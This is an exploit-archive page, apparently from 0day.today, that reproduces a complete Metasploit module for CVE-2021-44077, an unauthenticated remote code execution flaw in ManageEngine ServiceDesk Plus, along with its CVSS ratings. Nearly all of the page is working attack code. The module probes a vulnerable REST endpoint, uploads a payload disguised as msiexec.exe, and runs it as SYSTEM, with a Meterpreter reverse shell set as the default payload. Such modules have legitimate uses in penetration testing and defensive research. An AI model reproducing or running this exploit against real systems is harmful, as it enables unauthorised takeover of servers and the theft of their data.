ManageEngine ServiceDesk Plus Remote Code Execution Exploit

2021-12-2800:00:00

metasploit

0day.today

265

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

JSON

This Metasploit module exploits CVE-2021-44077, an unauthenticated remote code execution vulnerability in ManageEngine ServiceDesk Plus, to upload an EXE (msiexec.exe) and execute it as the SYSTEM account. Note that build 11305 is vulnerable to the authentication bypass but not the file upload. The module will check for an exploitable build.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'ManageEngine ServiceDesk Plus CVE-2021-44077',
        'Description' => %q{
          This module exploits CVE-2021-44077, an unauthenticated remote code
          execution vulnerability in ManageEngine ServiceDesk Plus, to upload an
          EXE (msiexec.exe) and execute it as the SYSTEM account.

          Note that build 11305 is vulnerable to the authentication bypass but
          not the file upload. The module will check for an exploitable build.
        },
        'Author' => [
          # Discovered by unknown threat actors
          'wvu', # Analysis and exploit
          'Y4er' # Additional confirmation
        ],
        'References' => [
          ['CVE', '2021-44077'],
          ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-authentication-bypass-vulnerability-in-servicedesk-plus-versions-11138-and-above'],
          ['URL', 'https://pitstop.manageengine.com/portal/en/community/topic/security-advisory-for-cve-2021-44077-unauthenticated-rce-vulnerability-in-servicedesk-plus-versions-up-to-11305-22-11-2021'],
          ['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa21-336a'],
          ['URL', 'https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/'],
          ['URL', 'https://attackerkb.com/topics/qv2aD8YfMN/cve-2021-44077/rapid7-analysis'],
          ['URL', 'https://xz.aliyun.com/t/10631'] # Y4er's writeup
        ],
        'DisclosureDate' => '2021-09-16',
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => [ARCH_X86, ARCH_X64],
        'Privileged' => true,
        'Targets' => [
          ['Windows Dropper', {}]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'RPORT' => 8080,
          'PAYLOAD' => 'windows/x64/meterpreter_reverse_tcp'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Base path', '/'])
    ])
  end

  def check
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians')
    )

    unless res
      return CheckCode::Unknown('Target failed to respond to check.')
    end

    # NOTE: /RestAPI/ImportTechnicians was removed after build 11303
    unless res.code == 200 && res.get_html_document.at('//form[@name="ImportTechnicians"]')
      return CheckCode::Safe('/RestAPI/ImportTechnicians is not present.')
    end

    CheckCode::Appears('/RestAPI/ImportTechnicians is present.')
  end

  def exploit
    upload_msiexec
    execute_msiexec
  end

  def upload_msiexec
    print_status('Uploading msiexec.exe')

    form = Rex::MIME::Message.new
    form.add_part(Faker::Hacker.verb, nil, nil, 'form-data; name="step"')
    form.add_part(generate_payload_exe, 'application/octet-stream', 'binary',
                  'form-data; name="theFile"; filename="msiexec.exe"')

    res = send_request_cgi(
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/ImportTechnicians'),
      'ctype' => "multipart/form-data; boundary=#{form.bound}",
      'data' => form.to_s
    )

    unless res&.code == 401 && res.body.include?('sdp.vulnerability.exceptionerror.title')
      fail_with(Failure::NotVulnerable, 'Failed to upload msiexec.exe')
    end

    print_good('Successfully uploaded msiexec.exe')
  end

  def execute_msiexec
    print_status('Executing msiexec.exe')

    # This endpoint "won't" return
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/RestAPI/s247action'),
      'vars_post' => {
        'execute' => 's247AgentInstallationProcess'
      }
    }, 0)
  end

  # XXX: FileDropper dies a miserable death if the file is in use
  def on_new_session(_session)
    super

    # Working directory is C:\Program Files\ManageEngine\ServiceDesk\site24x7
    print_warning("Yo, don't forget to clean up ..\\bin\\msiexec.exe")
  end

end